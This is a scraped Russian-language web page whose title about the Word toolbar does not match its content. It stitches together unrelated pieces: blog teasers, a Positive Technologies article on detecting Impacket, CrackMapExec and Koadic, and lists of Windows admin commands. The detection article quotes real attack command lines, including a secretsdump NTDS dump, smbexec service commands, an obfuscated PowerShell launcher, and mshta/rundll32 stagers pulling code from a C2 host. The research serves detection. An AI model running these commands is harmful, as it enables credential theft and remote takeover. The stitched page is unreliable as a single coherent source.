Панель инструментов в windows 10 в ворде

Распознавание голоса и речи на C#

UnmanagedCoder 05.05.2025

Интеграция голосового управления в приложения на C# стала намного доступнее благодаря развитию специализированных библиотек и API. При этом многие разработчики до сих пор считают голосовое управление. . .

Реализация своих итераторов в C++

NullReferenced 05.05.2025

Итераторы в C++ — это абстракция, которая связывает весь экосистему Стандартной Библиотеки Шаблонов (STL) в единое целое, позволяя алгоритмам работать с разнородными структурами данных без знания их. . .

Разработка собственного фреймворка для тестирования в C#

UnmanagedCoder 04.05.2025

C# довольно богат готовыми решениями – NUnit, xUnit, MSTest уже давно стали своеобразными динозаврами индустрии. Однако, как и любой динозавр, они не всегда могут протиснуться в узкие коридоры. . .

Распределенная трассировка в Java с помощью OpenTelemetry

Javaican 04.05.2025

Микросервисная архитектура стала краеугольным камнем современной разработки, но вместе с ней пришла и головная боль, знакомая многим — отслеживание прохождения запросов через лабиринт взаимосвязанных. . .

Шаблоны обнаружения сервисов в Kubernetes

Mr. Docker 04.05.2025

Современные Kubernetes-инфраструктуры сталкиваются с серьёзными вызовами. Развертывание в нескольких регионах и облаках одновременно, необходимость обеспечения низкой задержки для глобально. . .

Создаем SPA на C# и Blazor

stackOverflow 04.05.2025

Мир веб-разработки за последние десять лет претерпел коллосальные изменения. Переход от традиционных многостраничных сайтов к одностраничным приложениям (Single Page Applications, SPA) — это. . .

Реализация шаблонов проектирования GoF на C++

NullReferenced 04.05.2025

«Банда четырёх» (Gang of Four или GoF) — Эрих Гамма, Ричард Хелм, Ральф Джонсон и Джон Влиссидес — в 1994 году сформировали канон шаблонов, который выдержал проверку временем. И хотя C++ претерпел. . .

C# и сети: Сокеты, gRPC и SignalR

UnmanagedCoder 04.05.2025

Сетевые технологии не стоят на месте, а вместе с ними эволюционируют и инструменты разработки. В . NET появилось множество решений — от низкоуровневых сокетов, позволяющих управлять каждым байтом. . .

Создание микросервисов с Domain-Driven Design

ArchitectMsa 04.05.2025

Архитектура микросервисов за последние годы превратилась в мощный архитектурный подход, который позволяет разрабатывать гибкие, масштабируемые и устойчивые системы. А если добавить сюда ещё и. . .

Многопоточность в C++: Современные техники C++26

bytestream 04.05.2025

C++ долго жил по принципу «один поток — одна задача» — как старательный солдатик, выполняющий команды одну за другой. В то время, когда процессоры уже обзавелись несколькими ядрами, этот подход стал. . .

Картинка с сайта: habr.com

С каждым годом растет количество атак в корпоративном секторе: например в 2017 году зафиксировали на 13% больше уникальных инцидентов чем в 2016 г., а по итогам 2018 — на 27% больше инцидентов, чем в предыдущем периоде. В том числе и тех, где основным рабочим инструментом является операционная система Windows. В 2017—2018 годах группировки APT Dragonfly, APT28, APT MuddyWater проводили атаки на правительственные и военные организации Европы, Северной Америки и Саудовской Аравии. И использовали для этого три инструмента — Impacket, CrackMapExec и Koadic. Их исходный код открыт и доступен на GitHub.

Стоит отметить, что эти инструменты используются не для первичного проникновения, а для развития атаки внутри инфраструктуры. Злоумышленники используют их на разных стадиях атаки, следующих после преодоления периметра. Это, к слову сказать, сложно детектируется и зачастую только с помощью технологий выявления следов компрометации в сетевом трафике или инструментов, позволяющих обнаружить активные действия злоумышленника после проникновения его в инфраструктуру. Инструменты обеспечивают множество функций — от передачи файлов до взаимодействия с реестром и выполнения команд на удаленной машине. Мы провели исследование этих инструментов, чтобы определить их сетевую активность.

Что нам необходимо было сделать:

• Понять, как работает хакерский инструментарий. Узнать, что необходимо атакующим для эксплуатации и какими технологиями они могут воспользоваться.
• Найти то, что не детектируется средствами информационной безопасности на первых стадиях атаки. Стадия разведки может быть пропущена, либо потому что атакующим выступает внутренний злоумышленник, либо потому что атакующий пользуется брешью в инфраструктуре, о которой не было известно ранее. Появляется возможность восстановить всю цепочку его действий, отсюда возникает желание обнаруживать дальнейшее передвижение.
• Устранить ложные срабатывания средств обнаружения вторжений. Нельзя забывать и о том, что при обнаружении тех или иных действий на основе одной только разведки возможны частые ошибки. Обычно в инфраструктуре существует достаточное количество способов, неотличимых от легитимных на первый взгляд, получить какую-либо информацию.

Что же дают атакующим эти инструменты? Если это Impacket, то злоумышленники получают большую библиотеку модулей, которые можно использовать на разных стадиях атаки, следующих после преодоления периметра. Многие инструменты используют модули Impacket у себя внутри — например, Metasploit. В нем имеются dcomexec и wmiexec для удаленного выполнения команд, secretsdump для получения учетных записей из памяти, которые добавлены из Impacket. В итоге правильное обнаружение активности такой библиотеки обеспечит и обнаружение производных.

О CrackMapExec (или просто CME) создатели неслучайно написали «Powered by Impacket». Кроме того, CME имеет в себе готовую функциональность для популярных сценариев: это и Mimikatz для получения паролей или их хешей, и внедрение Meterpreter либо Empire agent для удаленного исполнения, и Bloodhound на борту.

Третий выбранный нами инструмент — Koadic. Он достаточно свеж, был представлен на международной хакерской конференции DEFCON 25 в 2017 году и отличается нестандартным подходом: работой через HTTP, Java Script и Microsoft Visual Basic Script (VBS). Такой подход называют living off the land: инструмент пользуется набором зависимостей и библиотек, встроенных в Windows. Создатели называют его COM Сommand & Сontrol, или С3.

IMPACKET

Функциональность Impacket весьма широка, начиная от разведки внутри AD и сбора данных с внутренних серверов MS SQL, заканчивая техниками для получения учетных данных: это и атака SMB relay, и получение с контроллера домена файла ntds.dit, содержащего хеши паролей пользователей. Также Impacket удаленно выполняет команды, используя четыре различных способа: через WMI, сервис для управления планировщиком Windows, DCOM и SMB, и для этого ему нужны учетные данные.

Secretsdump

Давайте рассмотрим secretsdump. Это модуль, целью которого могут быть как машины пользователей, так и контроллеры домена. С его помощью можно получать копии областей памяти LSA, SAM, SECURITY, NTDS.dit, поэтому его можно увидеть на разных стадиях атаки. Первым шагом в работе модуля является аутентификация через SMB, для которой необходим либо пароль пользователя, либо его хеш для автоматического проведения атаки Pass the Hash. Далее идет запрос на открытие доступа к Service Control Manager (SCM) и получение доступа к реестру по протоколу winreg, используя который атакующий может узнать данные интересующих его веток и получить результаты через SMB.

На рис. 1 мы видим, как именно при использовании протокола winreg происходит получение доступа по ключу реестра с LSA. Для этого используется команда DCERPC с opcode 15 — OpenKey.

Картинка с сайта: habr.com

Рис. 1. Открытие ключа реестра по протоколу winreg

Далее, когда доступ по ключу получен, происходит сохранение значений командой SaveKey с opcode 20. Impacket делает это весьма специфично. Он сохраняет значения в файл, имя которого — это строка из 8 случайных символов с добавлением .tmp. Кроме того, дальнейшая выгрузка этого файла происходит через SMB из директории System32 (рис. 2).

Картинка с сайта: habr.com

Рис. 2. Схема получения ключа реестра с удаленной машины

Выходит, обнаружить подобную активность в сети можно по запросам к определенным веткам реестра по протоколу winreg, специфичным именам, командам и их порядку.

Также этот модуль оставляет следы в журнале событий Windows, благодаря которым он легко обнаруживается. Например, в результате выполнения команды

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

в журнале Windows Server 2016 увидим следующую ключевую последовательность событий:

1. 4624 — удаленный Logon.
2. 5145 — проверка прав доступа к удаленному сервису winreg.
3. 5145 — проверка прав доступа к файлу в директории System32. Файл имеет случайное имя, упомянутое выше.
4. 4688 — создание процесса cmd.exe, который запускает vssadmin:

“C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 — создание процесса с командой:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

6. 4688 — создание процесса с командой:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

7. 4688 — создание процесса с командой:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

Smbexec

Как и у многих инструментов для постэксплуатации, у Impacket есть модули для удаленного выполнения команд. Мы остановимся на smbexec, который дает интерактивную командную оболочку на удаленной машине. Для этого модуля также требуется аутентификация через SMB либо паролем, либо его хешем. На рис. 3 мы видим пример работы такого инструмента, в данном случае это консоль локального администратора.

Картинка с сайта: habr.com

Рис. 3. Интерактивная консоль smbexec

Первым этапом работы smbexec после аутентификации является открытие SCM командой OpenSCManagerW (15). Запрос примечателен: в нем поле MachineName имеет значение DUMMY.

Картинка с сайта: habr.com

Рис. 4. Запрос на открытие Service Control Manager

Далее происходит создание сервиса с помощью команды CreateServiceW (12). В случае smbexec мы можем видеть каждый раз одинаковую логику построения команды. На рис. 5 зеленым цветом отмечены неизменяемые параметры команды, желтым — то, что атакующий может изменить. Нетрудно заметить, что имя исполняемого файла, его директорию и файл output изменить можно, но оставшееся поменять куда сложнее, не нарушая логику работы модуля Impacket.

Картинка с сайта: habr.com

Рис. 5. Запрос на создание сервиса с помощью Service Control Manager

Smbexec также оставляет явные следы в журнале событий Windows. В журнале Windows Server 2016 для интерактивной командной оболочки с командой ipconfig увидим следующую ключевую последовательность событий:

1. 4697 — установка сервиса на машине жертвы:

%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

2. 4688 — создание процесса cmd.exe с аргументами из пункта 1.
3. 5145 — проверка прав доступа к файлу __output в директории C$.
4. 4697 — установка сервиса на машине жертвы.

%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 — создание процесса cmd.exe с аргументами из пункта 4.
6. 5145 — проверка прав доступа к файлу __output в директории C$.

Impacket является основой для разработки инструментов для атак. Он поддерживает почти все протоколы в Windows-инфраструктуре и при этом имеет свои характерные особенности. Здесь и конкретные winreg-запросы, и использование SCM API с характерным формированием команд, и формат имен файлов, и SMB share SYSTEM32.

CRACKMAPEXEC

Инструмент CME призван в первую очередь автоматизировать те рутинные действия, которые приходится выполнять атакующему для продвижения внутри сети. Он позволяет работать в связке с небезызвестными Empire agent и Meterpreter. Чтобы выполнять команды скрытно, CME может их обфусцировать. Используя Bloodhound (отдельный инструмент для проведения разведки), атакующий может автоматизировать поиск активной сессии доменного администратора.

Bloodhound

Bloodhound как самостоятельный инструмент позволяет вести продвинутую разведку внутри сети. Он собирает данные о пользователях, машинах, группах, сессиях и поставляется в виде скрипта на PowerShell или бинарного файла. Для сбора информации используются LDAP или протоколы, базирующиеся на SMB. Интеграционный модуль CME позволяет загружать Bloodhound на машину жертвы, запускать и получать собранные данные после выполнения, тем самым автоматизируя действия в системе и делая их менее заметными. Графическая оболочка Bloodhound представляет собранные данные в виде графов, что позволяет найти кратчайший путь от машины атакующего до доменного администратора.

Картинка с сайта: habr.com

Рис. 6. Интерфейс Bloodhound

Для запуска на машине жертвы модуль создает задачу, используя ATSVC и SMB. ATSVC является интерфейсом для работы с планировщиком задач Windows. CME использует его функцию NetrJobAdd (1) для создания задач по сети. Пример того, что отправляет модуль CME, показан на рис. 7: это вызов команды cmd.exe и обфусцированный код в виде аргументов в формате XML.

Картинка с сайта: habr.com

Рис.7. Создание задачи через CME

После того как задача поступила на исполнение, машина жертвы запускает сам Bloodhound, и в трафике это можно увидеть. Для модуля характерны LDAP-запросы для получения стандартных групп, списка всех машин и пользователей в домене, получение информации об активных пользовательских сессиях через запрос SRVSVC NetSessEnum.

Картинка с сайта: habr.com

Рис. 8. Получение списка активных сессий через SMB

Кроме того, запуск Bloodhound на машине жертвы с включенным аудитом сопровождается событием с ID 4688 (создания процесса) и именем процесса «C:\Windows\System32\cmd.exe». Примечательным в нем являются аргументы командной строки:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

Весьма интересен с точки зрения функциональности и реализации модуль enum_avproducts. WMI позволяет с помощью языка запросов WQL получать данные различных объектов Windows, чем по сути и пользуется этот модуль CME. Он генерирует запросы к классам AntiSpywareProduct и AntiМirusProduct о средствах защиты, установленных на машине жертвы. Для того чтобы получить нужные данные, модуль выполняет подключение к пространству имен root\SecurityCenter2, затем формирует WQL-запрос и получает ответ. На рис. 9 показано содержимое таких запросов и ответов. В нашем примере нашелся Windows Defender.

Картинка с сайта: habr.com

Рис. 9. Сетевая активность модуля enum_avproducts

Зачастую аудит WMI (Trace WMI-Activity), в событиях которого можно найти полезную информацию о WQL-запросах, может оказаться выключенным. Но если он включен, то в случае запуска сценария enum_avproducts сохранится событие с ID 11. В нем будет содержаться имя пользователя, который отправил запрос, и имя в пространстве имен root\SecurityCenter2.

У каждого из модулей CME обнаружились свои артефакты, будь то специфические WQL-запросы или создание определенного вида задачи в task scheduler с обфускацией и характерная для Bloodhound активность в LDAP и SMB.

KOADIC

Отличительной особенностью Koadic является использование встроенных в Windows интерпретаторов JavaScript и VBScript. В этом смысле он следует тренду living off the land — то есть не имеет внешних зависимостей и пользуется стандартными средствами Windows. Это инструмент для полноценного Command & Control (CnC), поскольку после заражения на машину устанавливается «имплант», позволяющий ее контролировать. Такая машина, в терминологии Koadic, называется «зомби». При нехватке привилегий для полноценной работы на стороне жертвы Koadic имеет возможность их поднять, используя техники обхода контроля учетных записей (UAC bypass).

Картинка с сайта: habr.com

Рис. 10. Командная оболочка Koadic

Жертва должна сама инициировать общение с сервером Command & Control. Для этого ей необходимо обратиться по заранее подготовленному URI и получить основное тело Koadic с помощью одного из стейджеров. На рис. 11 показан пример для стейджера mshta.

Картинка с сайта: habr.com

Рис. 11. Инициализация сессии с CnC-сервером

По переменной WS ответа становится понятно, что исполнение происходит через WScript.Shell, а переменные STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE содержат ключевую информацию о параметрах текущей сессии. Это первая пара запрос-ответ в HTTP-соединении с CnC-сервером. Последующие запросы связаны непосредственно с функциональностью вызываемых модулей (имплантов). Все модули Koadic работают только с активной сессией c CnC.

Mimikatz

Так же, как CME работает с Bloodhound, Koadic работает с Mimikatz как с отдельной программой и имеет несколько способов ее запуска. Ниже представлена пара запрос-ответ для загрузки импланта Mimikatz.

Картинка с сайта: habr.com

Рис. 12. Передача Mimikatz в Koadic

Можно заметить, как изменился формат URI в запросе. В нем появилось значение у переменной csrf, которая отвечает за выбранный модуль. Не обращайте внимание на ее имя; все мы знаем, что под CSRF обычно понимают другое. В ответ пришло все то же основное тело Koadic, в которое добавился код, связанный с Mimikatz. Он достаточно большой, поэтому рассмотрим ключевые моменты. Перед нами закодированная в base64 библиотека Mimikatz, сериализованный .NET-класс, который будет ее инжектировать, и аргументы для запуска Mimikatz. Результат выполнения передается по сети в открытом виде.

Картинка с сайта: habr.com

Рис. 13. Результат выполнения Mimikatz на удаленной машине

Exec_cmd

В Koadic также есть модули, способные удаленно выполнять команды. Здесь мы увидим все тот же метод генерации URI и знакомые переменные sid и csrf. В случае модуля exec_cmd в тело добавляется код, который способен выполнять shell-команды. Ниже показан такой код, содержащийся в HTTP-ответе CnC-сервера.

Картинка с сайта: habr.com

Рис. 14. Код импланта exec_cmd

Переменная GAWTUUGCFI со знакомым атрибутом WS необходима для выполнения кода. С ее помощью имплант вызывает shell, обрабатывая две ветки кода — shell.exec с возвращением выходного потока данных и shell.run без возращения.

Koadic не является типичным инструментом, но имеет свои артефакты, по которым его можно найти в легитимном трафике:

• особое формирование HTTP-запросов,
• использование winHttpRequests API,
• создание объекта WScript.Shell через ActiveXObject,
• большое исполняемое тело.

Изначальное соединение инициирует стейджер, поэтому появляется возможность обнаруживать его активность через события Windows. Для mshta это событие 4688, которое говорит о создании процесса с атрибутом запуска:

C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6

Во время выполнения Koadic можно увидеть и другие события 4688 с атрибутами, которые отлично его характеризуют:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;\..\..\..\mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;\..\..\..\mshtml,RunHTMLApplication
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

Выводы

Тренд living off the land набирает популярность среди злоумышленников. Они используют встроенные в Windows инструменты и механизмы для своих нужд. Мы видим, как популярные инструменты Koadic, CrackMapExec и Impacket, следующие этому принципу, все чаще встречаются в отчетах об APT. Число форков на GitHub у этих инструментов также растет, появляются новые (сейчас их уже около тысячи). Тренд набирает популярность в силу своей простоты: злоумышленникам не нужны сторонние инструменты, они уже есть на машинах жертв и помогают обходить средства защиты. Мы сосредоточены на изучении сетевого взаимодействия: каждый описанный выше инструмент оставляет свои следы в сетевом трафике; подробное их изучение позволило нам научить наш продукт PT Network Attack Discovery их обнаруживать, что в итоге помогает расследовать всю цепочку киберинцидентов с их участием.

Авторы:

• Антон Тюрин, руководитель отдела экспертных сервисов, PT Expert Security Center, Positive Technologies
• Егор Подмоков, эксперт, PT Expert Security Center, Positive Technologies

MSC в Windows расшифровывается как Microsoft System Console, еще проще это окна или как их еще называют оснастки, для управления теми или иными функциями операционной системы. Ранее я вас уже знакомил с методом создания удобной оснастки mmc, в которой мы добавляли все, что нужно системному администратору для повседневного администрирования.

И вы наверно спросите, а при чем тут командная строка и все такое, а вот при чем. Представим себе ситуацию, у вас в организации существует домен Active Directory, рядовые пользователи не имеют прав локального администратора на своих рабочих станциях, все идет и работает как часы, случается ситуация, что например вам нужно у пользователя поменять какие либо настройки, и сделать нужно сейчас, так что искать эти настройки в групповой политике нет времени. Что делать заходить под собой не вариант, так как нужно произвести изменения в другом профиле пользователя, и как открыть например оснастку Управление компьютером или Система.

Во тут нам и поможет знание названия msc windows оснасток и командная строка. Все что вам нужно это открыть командную строку от имени администратора (найти, набираем cmd и правой кнопкой выбираем “Запустить от имени администратора”), 

далее ввести нужное название msc оснастки в командной строке. Ниже представлен список. Как видите открыв командную строку cmd.exe я для примера ввел значение открывающее панель управления с правами администратора системы.

Картинка с сайта: subbnet.ru

Элементы оснастки Консоли управления msc

• appwiz.cpl — Установка и удаление программ
• certmgr.msc — Сертификаты
• ciаdv.msc — Служба индексирования
• cliconfg — Программа сетевого клиента SQL
• clipbrd — Буфер обмена
• compmgmt.msc — Управление компьютером
• dcomcnfg — Консоль управления DCOM компонентами
• ddeshare — Общие ресурсы DDE (на Win7 не работает)
• desk.cpl — Свойства экрана
• devmgmt.msc — Диспетчер устройств
• dfrg.msc — Дефрагментация дисков
• diskmgmt.msc — Управление дисками
• drwtsn32 — Dr.Watson
• dxdiag — Служба диагностики DirectX
• eudcedit — Редактор личных символов
• eventvwr.msc — Просмотр событий
• firewall.cpl — настройки файерволла Windows
• gpedit.msc — Групповая политика
• fsmgmt.msc — Общие папки
• fsquirt — Мастер передачи файлов Bluetooth
• chkdsk — Проверка дисков (обычно запускается с параметрами буква_диска: /f /x /r)
• control printers — Принтеры и факсы — запускается не всегда
• control admintools — Администрирование компьютера — запускается не всегда
• control schedtasks — Назначенные задания (планировщик)
• control userpasswords2 — Управление учётными записями
• compmgmt.msc — Управление компьютером (compmgmt.msc /computer=pc — удаленное управление компьютером pc)
• lusrmgr.msc — Локальные пользователи и группы
• mmc— создание своей оснастки
• mrt.exe — Удаление вредоносных программ
• msconfig — Настройка системы (автозапуск, службы)
• mstsc — Подключение к удаленному рабочему столу
• cleanmgr — Очистка диска
• ncpa.cpl — Сетевые подключения
• ntmsmgr.msc — Съёмные ЗУ
• mmsys.cpl — Звук
• ntmsoprq.msc — Запросы операторов съёмных ОЗУ (для XP)
• odbccp32.cpl — Администратор источников данных
• perfmon.msc — Производительность
• regedit — Редактор реестра
• rsop.msc — Результирующая политика
• secpol.msc — Локальные параметры безопасности (Локальная политика безопасности)
• services.msc — Службы
• sfc /scannow — Восстановление системных файлов
• sigverif — Проверка подписи файла
• sndvol — управление громкостью
• sysdm.cpl — Свойства системы
• syskey — Защита БД учётных записей
• taskmgr — Диспетчер задач
• utilman Диспетчер служебных программ
• verifier Диспетчер проверки драйверов
• wmimgmt.msc — Инфраструктура управления WMI
• timedate.cpl — Оснастка «Дата и время»

Картинка с сайта: subbnet.ru

Список msc оснасток для Windows Server

Давайте рассмотрим как запускаются Административные оснастки Windows из командной строки cmd.exe

• domain.msc — Active Directory домены и доверие
• dsa.msc — Active Directory Пользователи и компьютеры (AD Users and Computers)
• tsadmin.msc — Диспетчер служб терминалов (Terminal Services Manager)
• gpmc.msc — Консоль управления GPO (Group Policy Management Console)
• gpedit.msc — Редактор объектов локальной политики (Group Policy Object Editor)
• tscc.msc — Настройка терминального сервера (TS Configuration)
• rrasmgmt.msc — Маршрутизация и удаленый доступ (Routing and Remote Access)
• dssite.msc — Active Directory Сайты и Доверие (AD Sites and Trusts)
• dompol.msc — Политика безопасности домена (Domain Security Settings)
• dсpol.msc — Политика безопасности контроллера домена (DC Security Settings)
• dfsgui.msc — Распределенная файловая система DFS (Distributed File System)
• dnsmgmt.msc — DNS
• iscsicpl.exe — Инициатор ISCSI
• odbcad32.exe — Администратор источника данных ODBC 32 бита
• odbcad64.exe — Администратор источника данных ODBC 64 бита
• powershell.exe -noexit -command import-module ActiveDirectory — Модуль powershell Active Directory
• dfrgui.exe — Оптимизация дисков
• taskschd.msc /s — Планировщик заданий
• dsac.exe — Центр администрирования Active Directory
• printmanagement.msc — Управление печатью
• vmw.exe — Средство активации корпоративных лицензий
• eventvwr.msc /s — Просмотр событий
• adsiedit.msc — Редактор ADSIedit
• wbadmin.msc — Система архивации данных Windows Server
• ServerManager.exe — Диспетчер серверов
• dhcpmgmt.msc — DHCP сервер
• Inetmgr.exe — Оснастка IIS
• dfsmgmt.msc- DFS менеджер

Как видите msc windows оснастки очень полезные инструменты системного администрирования. Мне даже некоторые оснастки быстрее открыть чем щелкать мышкой по куче окон, особенно если сервер или компьютер тормозит или нет мышки. Да и в любом случае знать такие вещи всегда полезно. Большая часть всего, что мы используем хранится в c:\Windows\System32. Если вы пройдете в эту папку то сможете обнаружить очень много интересного.

nbtstat -a pc — имя пользователя работающего за удаленной машиной pc
net localgroup group user /add — Добавить в группу group, пользователя user
net localgroup group user /delete — Удалить пользователя из группы
net send pc ''текст '' — отправить сообщение пользователю компьютера pc
net sessions — список пользователей
net session /delete — закрывает все сетевые сессии
net use l: \\имя компа\папка\ — подключить сетевым диском l: папку на удаленном компьютере
net user имя /active:no — заблокировать пользователя
net user имя /active:yes — разблокировать пользователя
net user имя /domain — информация о пользователе домена
net user Имя /add — добавить пользователя
net user Имя /delete — удалить пользователя
netstat -a — список всех подключений к компьютеру
reg add — Добавить параметр в реестр
reg compare — Сравнивать части реестра.
reg copy — Копирует из одного раздела в другой
reg delete — Удаляет указанный параметр или раздел
reg export — Экспортировать часть реестра
reg import — Соответственно импортировать часть реестра
reg load — Загружает выбранную часть реестра
reg query — Выводит значения заданной ветки реестра
reg restore — Восстанавливает выбранную часть реестра из файла
reg save — Сохраняет выбранную часть реестра
reg unload — Выгружает выбранную часть реестра
shutdown — выключение компьютера , можно удаленно выключить другой.
SystemInfo /s machine — покажет много полезного об удаленной машине

Списка команд элементов Панели управления Windows

• control /name Microsoft.AutoPlay — Автозапуск
• control /name Microsoft.OfflineFiles — Автономные файлы
• control /name Microsoft.AdministrativeTools — Администрирование
• control /name Microsoft.BackupAndRestore — Архивация и восстановление
• control /name Microsoft.WindowsFirewall — Брандмауэр Windows Windows
• control /name Microsoft.Recovery — Восстановление
• control /name Microsoft.DesktopGadgets — Гаджеты рабочего стола
• control /name Microsoft.DateAndTime — Дата и Время
• control /name Microsoft.DeviceManager — Диспетчер устройств
• control /name Microsoft.CredentialManager — Диспетчер учетных данных
• control /name Microsoft.HomeGroup — Домашняя группа
• Windowscontrol /name Microsoft.WindowsDefender — Защитник Windows
• control /name Microsoft.Sound — Звук
• control /name Microsoft.NotificationAreaIcons — Значки области уведомлений
• control /name Microsoft.GameControllers — Игровые устройства
• Keyboardcontrol /name Microsoft.Keyboard — Клавиатура
• control /name Microsoft.Mouse — Мышь
• control /name Microsoft.TaskbarAndStartMenu — Панель задач и меню «Пуск»
• control — Панель управления
• control /name Microsoft.Fonts — Папка «Fonts»
• control /name Microsoft.IndexingOptions — Параметры индексирования
• control /name Microsoft.FolderOptions — Параметры папок
• control /name Microsoft.PenAndTouch — Перо и сенсорные устройства
• control /name Microsoft.Personalization — Персонализация
• control /name Microsoft.RemoteAppAndDesktopConnections — Подключения к удаленным рабочим столам
• control /name Microsoft.GetPrograms — Получение программ
• control /name Microsoft.GettingStarted — Приступая к работе
• control /name Microsoft.ProgramsAndFeatures —  Программы и компоненты
• сontrol /name Microsoft.DefaultPrograms — Программы по умолчанию
• control /name Microsoft.SpeechRecognition — Распознавание речи
• control /name Microsoft.ParentalControls — Родительский контроль
• control /name Microsoft.InternetOptions — Свойства обозревателя
• control /name Microsoft.TextToSpeech — Свойства речи
• control /name Microsoft.System — Система
• control /name Microsoft.ScannersAndCameras — Сканеры и камеры
• control /name Microsoft.PerformanceInformationAndTools — Счетчики и средства производительности
• control /name Microsoft.PhoneAndModem — Телефон и модем
• control /name Microsoft.ColorManagement —  Управление цветом
• control /name Microsoft.Troubleshooting —  Устранение неполадок
• control /name Microsoft.DevicesAndPrinters — Устройства и принтеры
• control /name Microsoft.UserAccounts — Учетные записи пользователей
• control /name Microsoft.MobilityCenter — Центр мобильности
• control /name Microsoft.WindowsUpdate — Центр обновления
• control /name Microsoft.ActionCenter — Центр поддержки
• control /name Microsoft.SyncCenter — Центр синхронизации
• control /name Microsoft.EaseOfAccessCenter — Центр специальных возможностей
• control /name Microsoft.NetworkAndSharingCenter — Центр управления сетями и общим доступом
• control /name Microsoft.BitLockerDriveEncryption — Шифрование диска
• control /name Microsoft.Display — Экран
• control /name Microsoft.PowerOptions — Электропитание
• control /name Microsoft.RegionAndLanguage — Язык и региональные стандарты
• control folders — параметры проводника

Способ 1: Системный поиск

Через поиск системы можно быстро отыскать оснастку «Службы компонентов». Для этого достаточно кликнуть по «Пуску» или кнопке поиска на панели задач и ввести один из вариантов:

• службы компонентов;
• dcomcnfg;
• dcomcnfg.exe.

В блоке «Лучшее соответствие» отобразится значок для запуска приложения.

Картинка с сайта: lumpics.ru

Способ 2: Оснастка «Выполнить»

Чтобы найти «Службы компонентов» в Windows 10, используется диалоговое окно «Выполнить». Одновременно зажмите клавиши «Win + R» и в текстовое поле «Открыть» вставьте команду dcomcnfg, затем нажмите на кнопку «ОК» или клавишу «Enter» для выполнения.

Картинка с сайта: lumpics.ru

Читайте также: Вызов оснастки «Выполнить» в ОС Windows 10

Способ 3: «Командная строка»

Для запуска штатного приложения можно использовать и консоли, которых в Windows 10 реализовано две: «Windows PowerShell» и классическая «Командная строка».

1. Отыщите одно из средств через поиск системы и запустите его с правами администратора.


Картинка с сайта: lumpics.ru

2. В окне консоли впишите команду dcomcnfg и нажмите на клавишу «Enter».


Картинка с сайта: lumpics.ru

По умолчанию в «десятке» PowerShell располагается в контекстном меню кнопки «Пуск».

Картинка с сайта: lumpics.ru

Читайте также: Что делать, если не работает «Командная строка» в Windows 10

Способ 4: Системная папка

Все исполняемые файлы штатных инструментов, включая средства администрирования, располагаются в определенной папке на системном локальном диске, и запустить «Службы компонентов» можно оттуда:

1. Запустите встроенный «Проводник» или дважды кликните по иконке «Этот компьютер» на рабочем столе.
2. Пройдите по такому пути: C:\Windows\System32.


Картинка с сайта: lumpics.ru

3. Отыщите файл «dcomcnfg», отсортировав данные по алфавиту или используя поисковую строку в верхнем правом углу.


Картинка с сайта: lumpics.ru

Файл «dcomcnfg» является исполняемым, перемещать, изменять или удалять его нет возможности, но можно двойным кликом ЛКМ запустить из системной папки.

Способ 5: «Панель управления»

Все средства администрирования располагаются в одноименном разделе «Панели управления»:

1. Откройте «Панель управления» и выберите отображение разделов в виде крупных или мелких значков для удобства, затем откройте «Администрирование».


Картинка с сайта: lumpics.ru

2. В списке средств есть и ярлык приложения «Службы компонентов», который запускается двойным щелчком левой кнопкой мыши.


Картинка с сайта: lumpics.ru

Раздел «Средства администрирования Windows» также отдельно доступен и в системной поисковой строке.

Картинка с сайта: lumpics.ru

Наша группа в TelegramПолезные советы и помощь